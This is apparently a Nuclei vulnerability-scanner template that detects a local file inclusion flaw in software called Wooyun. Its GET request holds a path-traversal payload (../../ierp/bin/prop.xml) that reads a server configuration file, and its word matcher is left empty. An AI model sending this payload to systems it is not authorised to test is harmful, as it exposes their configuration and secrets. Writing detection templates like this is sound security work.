id: wooyun-path-traversal info: name: Wooyun - Local File Inclusion author: pikpikcu severity: high description: | Wooyun is vulnerable to local file inclusion. reference: - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 tags: lfi,wooyun requests: - method: GET path: - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - - part: body condition: and # Enhanced by mp on 2022/07/29